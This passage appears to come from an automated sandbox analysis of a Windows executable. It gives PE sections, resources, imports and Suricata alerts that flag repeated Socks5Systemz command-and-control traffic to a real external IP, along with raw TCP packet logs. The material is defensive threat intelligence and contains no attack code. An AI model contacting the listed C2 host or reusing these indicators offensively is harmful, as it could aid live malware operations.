                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_TLS0xf0000x18.rdata
                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                            Sections

                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                            CODE0x10000x9d300x9e00c3bd95c4b1a8e5199981e0d9b45fd18cFalse0.6052709651898734data6.631765876950794IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                            DATA0xb0000x2500x4001ee71d84f1c77af85f1f5c278f880572False0.306640625data2.751820662285145IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                            BSS0xc0000xe8c0x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                            .idata0xd0000x9500xa00bb5485bf968b970e5ea81292af2acdbaFalse0.414453125data4.430733069799036IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                            .tls0xe0000x80x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                            .rdata0xf0000x180x2009ba824905bf9c7922b6fc87a38b74366False0.052734375data0.2044881574398449IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                            .reloc0x100000x8c40x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                            .rsrc0x110000x2c000x2c00c7a535967b01f9cfbd01353f9d5b9d89False0.32563920454545453data4.49363155636498IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ

                                                            Resources

                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                            RT_ICON0x113540x128Device independent bitmap graphic, 16 x 32 x 4, image size 192DutchNetherlands0.5675675675675675
                                                            RT_ICON0x1147c0x568Device independent bitmap graphic, 16 x 32 x 8, image size 320DutchNetherlands0.4486994219653179
                                                            RT_ICON0x119e40x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 640DutchNetherlands0.4637096774193548
                                                            RT_ICON0x11ccc0x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1152DutchNetherlands0.3935018050541516
                                                            RT_STRING0x125740x2f2data0.35543766578249336
                                                            RT_STRING0x128680x30cdata0.3871794871794872
                                                            RT_STRING0x12b740x2cedata0.42618384401114207
                                                            RT_STRING0x12e440x68data0.75
                                                            RT_STRING0x12eac0xb4data0.6277777777777778
                                                            RT_STRING0x12f600xaedata0.5344827586206896
                                                            RT_RCDATA0x130100x2cdata1.1818181818181819
                                                            RT_GROUP_ICON0x1303c0x3edataEnglishUnited States0.8387096774193549
                                                            RT_VERSION0x1307c0x4f4dataEnglishUnited States0.2618296529968454
                                                            RT_MANIFEST0x135700x5a4XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.42590027700831024

                                                            Imports

                                                            DLLImport
                                                            kernel32.dllDeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, VirtualFree, VirtualAlloc, LocalFree, LocalAlloc, WideCharToMultiByte, TlsSetValue, TlsGetValue, MultiByteToWideChar, GetModuleHandleA, GetLastError, GetCommandLineA, WriteFile, SetFilePointer, SetEndOfFile, RtlUnwind, ReadFile, RaiseException, GetStdHandle, GetFileSize, GetSystemTime, GetFileType, ExitProcess, CreateFileA, CloseHandle
                                                            user32.dllMessageBoxA
                                                            oleaut32.dllVariantChangeTypeEx, VariantCopyInd, VariantClear, SysStringLen, SysAllocStringLen
                                                            advapi32.dllRegQueryValueExA, RegOpenKeyExA, RegCloseKey, OpenProcessToken, LookupPrivilegeValueA
                                                            kernel32.dllWriteFile, VirtualQuery, VirtualProtect, VirtualFree, VirtualAlloc, Sleep, SizeofResource, SetLastError, SetFilePointer, SetErrorMode, SetEndOfFile, RemoveDirectoryA, ReadFile, LockResource, LoadResource, LoadLibraryA, IsDBCSLeadByte, GetWindowsDirectoryA, GetVersionExA, GetUserDefaultLangID, GetSystemInfo, GetSystemDefaultLCID, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLastError, GetFullPathNameA, GetFileSize, GetFileAttributesA, GetExitCodeProcess, GetEnvironmentVariableA, GetCurrentProcess, GetCommandLineA, GetACP, InterlockedExchange, FormatMessageA, FindResourceA, DeleteFileA, CreateProcessA, CreateFileA, CreateDirectoryA, CloseHandle
                                                            user32.dllTranslateMessage, SetWindowLongA, PeekMessageA, MsgWaitForMultipleObjects, MessageBoxA, LoadStringA, ExitWindowsEx, DispatchMessageA, DestroyWindow, CreateWindowExA, CallWindowProcA, CharPrevA
                                                            comctl32.dllInitCommonControls
                                                            advapi32.dllAdjustTokenPrivileges

                                                            Possible Origin

                                                            Language of compilation systemCountry where language is spokenMap
                                                            DutchNetherlands
                                                            EnglishUnited States

                                                            Network Behavior

                                                            Suricata IDS Alerts

                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                            2024-09-11T21:05:56.592753+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549694185.196.8.21480TCP
                                                            2024-09-11T21:05:56.945730+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549694185.196.8.21480TCP
                                                            2024-09-11T21:05:57.759019+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549695185.196.8.21480TCP
                                                            2024-09-11T21:05:58.587230+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549696185.196.8.21480TCP
                                                            2024-09-11T21:05:59.436703+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549698185.196.8.21480TCP
                                                            2024-09-11T21:05:59.808909+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549698185.196.8.21480TCP
                                                            2024-09-11T21:06:00.173237+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549698185.196.8.21480TCP
                                                            2024-09-11T21:06:04.025367+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549699185.196.8.21480TCP
                                                            2024-09-11T21:06:04.856670+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549700185.196.8.21480TCP
                                                            2024-09-11T21:06:05.212808+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549700185.196.8.21480TCP
                                                            2024-09-11T21:06:06.172922+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549701185.196.8.21480TCP
                                                            2024-09-11T21:06:07.015813+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549705185.196.8.21480TCP
                                                            2024-09-11T21:06:07.862918+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549706185.196.8.21480TCP
                                                            2024-09-11T21:06:08.685168+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549708185.196.8.21480TCP
                                                            2024-09-11T21:06:09.037740+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549708185.196.8.21480TCP
                                                            2024-09-11T21:06:09.851395+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549710185.196.8.21480TCP
                                                            2024-09-11T21:06:11.069617+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549711185.196.8.21480TCP
                                                            2024-09-11T21:06:11.896319+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549712185.196.8.21480TCP
                                                            2024-09-11T21:06:12.773663+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549713185.196.8.21480TCP
                                                            2024-09-11T21:06:13.605918+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549714185.196.8.21480TCP
                                                            2024-09-11T21:06:14.458614+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549715185.196.8.21480TCP
                                                            2024-09-11T21:06:15.308093+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549716185.196.8.21480TCP
                                                            2024-09-11T21:06:15.657816+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549716185.196.8.21480TCP
                                                            2024-09-11T21:06:16.511272+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549717185.196.8.21480TCP
                                                            2024-09-11T21:06:16.890327+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549717185.196.8.21480TCP
                                                            2024-09-11T21:06:17.260660+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549717185.196.8.21480TCP
                                                            2024-09-11T21:06:18.082965+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549718185.196.8.21480TCP
                                                            2024-09-11T21:06:18.905971+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549719185.196.8.21480TCP
                                                            2024-09-11T21:06:19.748752+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549720185.196.8.21480TCP
                                                            2024-09-11T21:06:20.096601+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549720185.196.8.21480TCP
                                                            2024-09-11T21:06:20.936229+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549721185.196.8.21480TCP
                                                            2024-09-11T21:06:21.296599+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549721185.196.8.21480TCP
                                                            2024-09-11T21:06:22.198017+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549722185.196.8.21480TCP
                                                            2024-09-11T21:06:22.998760+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549723185.196.8.21480TCP
                                                            2024-09-11T21:06:23.356736+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549723185.196.8.21480TCP
                                                            2024-09-11T21:06:23.709679+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549723185.196.8.21480TCP
                                                            2024-09-11T21:06:24.545349+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549724185.196.8.21480TCP
                                                            2024-09-11T21:06:24.913525+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549724185.196.8.21480TCP
                                                            2024-09-11T21:06:25.760563+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549725185.196.8.21480TCP
                                                            2024-09-11T21:06:26.218181+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549725185.196.8.21480TCP
                                                            2024-09-11T21:06:26.568628+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549725185.196.8.21480TCP
                                                            2024-09-11T21:06:27.422938+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549726185.196.8.21480TCP
                                                            2024-09-11T21:06:27.778832+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549726185.196.8.21480TCP
                                                            2024-09-11T21:06:28.137634+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549726185.196.8.21480TCP
                                                            2024-09-11T21:06:28.493940+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549726185.196.8.21480TCP
                                                            2024-09-11T21:06:29.319896+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549727185.196.8.21480TCP
                                                            2024-09-11T21:06:30.164158+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549728185.196.8.21480TCP
                                                            2024-09-11T21:06:31.118017+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549729185.196.8.21480TCP
                                                            2024-09-11T21:06:31.961080+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549730185.196.8.21480TCP
                                                            2024-09-11T21:06:33.084848+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549731185.196.8.21480TCP
                                                            2024-09-11T21:06:33.902633+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549732185.196.8.21480TCP
                                                            2024-09-11T21:06:34.288980+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549732185.196.8.21480TCP
                                                            2024-09-11T21:06:35.098906+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549733185.196.8.21480TCP
                                                            2024-09-11T21:06:35.918371+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549734185.196.8.21480TCP
                                                            2024-09-11T21:06:36.274434+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549734185.196.8.21480TCP
                                                            2024-09-11T21:06:37.246858+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549735185.196.8.21480TCP
                                                            2024-09-11T21:06:37.594424+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549735185.196.8.21480TCP
                                                            2024-09-11T21:06:37.940100+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549735185.196.8.21480TCP
                                                            2024-09-11T21:06:38.788211+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549736185.196.8.21480TCP
                                                            2024-09-11T21:06:39.632773+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549737185.196.8.21480TCP
                                                            2024-09-11T21:06:40.485386+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549738185.196.8.21480TCP
                                                            2024-09-11T21:06:40.839571+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549738185.196.8.21480TCP
                                                            2024-09-11T21:06:41.199616+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549738185.196.8.21480TCP
                                                            2024-09-11T21:06:41.796373+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549738185.196.8.21480TCP
                                                            2024-09-11T21:06:42.152596+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549738185.196.8.21480TCP
                                                            2024-09-11T21:06:42.687249+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549738185.196.8.21480TCP
                                                            2024-09-11T21:06:43.040861+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549738185.196.8.21480TCP
                                                            2024-09-11T21:06:43.864891+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549739185.196.8.21480TCP
                                                            2024-09-11T21:06:44.711438+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549740185.196.8.21480TCP
                                                            2024-09-11T21:06:45.545838+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549741185.196.8.21480TCP
                                                            2024-09-11T21:06:45.897834+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549741185.196.8.21480TCP
                                                            2024-09-11T21:06:46.723627+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549742185.196.8.21480TCP
                                                            2024-09-11T21:06:47.539506+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549743185.196.8.21480TCP
                                                            2024-09-11T21:06:48.660925+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549744185.196.8.21480TCP
                                                            2024-09-11T21:06:49.481618+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549745185.196.8.21480TCP
                                                            2024-09-11T21:06:50.341493+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549746185.196.8.21480TCP
                                                            2024-09-11T21:06:50.706826+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549746185.196.8.21480TCP
                                                            2024-09-11T21:06:51.549357+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549747185.196.8.21480TCP
                                                            2024-09-11T21:06:52.389623+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549748185.196.8.21480TCP
                                                            2024-09-11T21:06:53.198866+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549749185.196.8.21480TCP
                                                            2024-09-11T21:06:53.551402+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549749185.196.8.21480TCP
                                                            2024-09-11T21:06:54.402867+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549750185.196.8.21480TCP
                                                            2024-09-11T21:06:54.765378+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549750185.196.8.21480TCP
                                                            2024-09-11T21:06:55.585127+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549751185.196.8.21480TCP
                                                            2024-09-11T21:06:56.428401+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549752185.196.8.21480TCP
                                                            2024-09-11T21:06:57.264250+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549753185.196.8.21480TCP
                                                            2024-09-11T21:06:58.076172+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549754185.196.8.21480TCP
                                                            2024-09-11T21:06:58.906526+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549755185.196.8.21480TCP
                                                            2024-09-11T21:06:59.848506+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549756185.196.8.21480TCP
                                                            2024-09-11T21:07:00.991707+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549757185.196.8.21480TCP
                                                            2024-09-11T21:07:01.839737+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549758185.196.8.21480TCP
                                                            2024-09-11T21:07:02.669331+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549759185.196.8.21480TCP
                                                            2024-09-11T21:07:03.550461+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549760185.196.8.21480TCP
                                                            2024-09-11T21:07:04.444123+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549761185.196.8.21480TCP
                                                            2024-09-11T21:07:05.339435+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549762185.196.8.21480TCP
                                                            2024-09-11T21:07:06.175896+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549763185.196.8.21480TCP
                                                            2024-09-11T21:07:07.004269+02002049467ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M11192.168.2.549764185.196.8.21480TCP

                                                            Network Port Distribution

                                                            TCP Packets

                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Sep 11, 2024 21:05:55.892261028 CEST4969480192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:05:55.897249937 CEST8049694185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:05:55.897490978 CEST4969480192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:05:55.897671938 CEST4969480192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:05:55.902595043 CEST8049694185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:05:56.592645884 CEST8049694185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:05:56.592752934 CEST4969480192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:05:56.702069044 CEST4969480192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:05:56.707371950 CEST8049694185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:05:56.945528984 CEST8049694185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:05:56.945729971 CEST4969480192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:05:57.061623096 CEST4969480192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:05:57.062094927 CEST4969580192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:05:57.067312002 CEST8049694185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:05:57.067435026 CEST8049695185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:05:57.067451000 CEST4969480192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:05:57.067595005 CEST4969580192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:05:57.067815065 CEST4969580192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:05:57.072933912 CEST8049695185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:05:57.758820057 CEST8049695185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:05:57.759018898 CEST4969580192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:05:57.874769926 CEST4969580192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:05:57.875134945 CEST4969680192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:05:57.880140066 CEST8049695185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:05:57.880186081 CEST8049696185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:05:57.880237103 CEST4969580192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:05:57.880286932 CEST4969680192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:05:57.880429029 CEST4969680192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:05:57.885328054 CEST8049696185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:05:58.587096930 CEST8049696185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:05:58.587229967 CEST4969680192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:05:58.701725006 CEST4969680192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:05:58.701984882 CEST4969880192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:05:58.707294941 CEST8049696185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:05:58.707333088 CEST8049698185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:05:58.707374096 CEST4969680192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:05:58.707407951 CEST4969880192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:05:58.707561016 CEST4969880192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:05:58.712817907 CEST8049698185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:05:59.436620951 CEST8049698185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:05:59.436702967 CEST4969880192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:05:59.545393944 CEST4969880192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:05:59.550410986 CEST8049698185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:05:59.808842897 CEST8049698185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:05:59.808908939 CEST4969880192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:05:59.920454025 CEST4969880192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:05:59.925488949 CEST8049698185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:00.172555923 CEST8049698185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:00.173237085 CEST4969880192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:00.295784950 CEST4969880192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:00.296066046 CEST4969980192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:00.301093102 CEST8049699185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:00.301256895 CEST4969980192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:00.301341057 CEST4969980192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:00.301780939 CEST8049698185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:00.301845074 CEST4969880192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:00.306479931 CEST8049699185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:04.025146961 CEST8049699185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:04.025367022 CEST4969980192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:04.139446974 CEST4969980192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:04.139848948 CEST4970080192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:04.145023108 CEST8049699185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:04.145050049 CEST8049700185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:04.145097017 CEST4969980192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:04.145143986 CEST4970080192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:04.145266056 CEST4970080192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:04.150393963 CEST8049700185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:04.856555939 CEST8049700185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:04.856669903 CEST4970080192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:04.967935085 CEST4970080192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:04.972755909 CEST8049700185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:05.212599993 CEST8049700185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:05.212807894 CEST4970080192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:05.327626944 CEST4970080192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:05.328061104 CEST4970180192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:05.332868099 CEST8049700185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:05.332940102 CEST8049701185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:05.332962990 CEST4970080192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:05.333039045 CEST4970180192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:05.333175898 CEST4970180192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:05.338212013 CEST8049701185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:06.172828913 CEST8049701185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:06.172921896 CEST4970180192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:06.295403004 CEST4970180192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:06.295757055 CEST4970580192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:06.300642014 CEST8049705185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:06.300733089 CEST4970580192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:06.300848007 CEST4970580192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:06.301052094 CEST8049701185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:06.301110983 CEST4970180192.168.2.5185.196.8.214
                                                            Sep 11, 2024 21:06:06.305634975 CEST8049705185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:07.015593052 CEST8049705185.196.8.214192.168.2.5
                                                            Sep 11, 2024 21:06:07.015813112 CEST4970580192.168.2.5185.196.8.214
